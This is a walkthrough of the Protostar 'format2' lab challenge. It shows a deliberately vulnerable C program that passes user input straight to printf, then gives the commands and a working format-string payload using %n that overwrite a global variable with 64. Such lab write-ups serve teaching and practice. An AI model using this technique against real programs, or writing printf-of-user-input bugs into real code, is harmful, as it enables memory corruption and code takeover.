Protostar vm, format2

protostar

Here is the source of the vulnerable program :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);
  printf(buffer);
  
  if(target == 64) {
      printf("you have modified the target :)\n");
  } else {
      printf("target is %d :(\n", target);
  }
}

int main(int argc, char **argv)
{
  vuln();
}

This challenge is a slight variation of the previous one
On top of writing to a specific address, this time we’ll have to write a specific number : 64

Like the previous challenge, let’s find target’s address and where the string is written on the stack by printf.

1
2
3
4
5
6
7
user@protostar:~$ /opt/protostar/bin/./format2
ABABABAB%x.%x.%X.%X.%X.%X.%X.%X.%X.%X 
ABABABAB200.�b7fd8420.BFFFF604.42414241.42414241.C32E7825.252E7825.58252E58.2E58252E.252E5825
target is 0 :(
user@protostar:~$ objdump -t /opt/protostar/bin/format2 | grep target
080496e4 g     O .bss	00000004              target
user@protostar:~$

We have to write at 080496e4 at the 4th address. Now how can we write exactly 64 ? Well we can use the same trick from format0 and pad the buffer with the minimum field width.

1
2
3
4
5
6
user@protostar:~$ python -c 'print "\xe4\x96\x04\x08"+"%60d"+"%4$n"' > payload 
user@protostar:~$ cat payload - | /opt/protostar/bin/./format2
��                                                         512
you have modified the target :)

user@protostar:~$

There you go.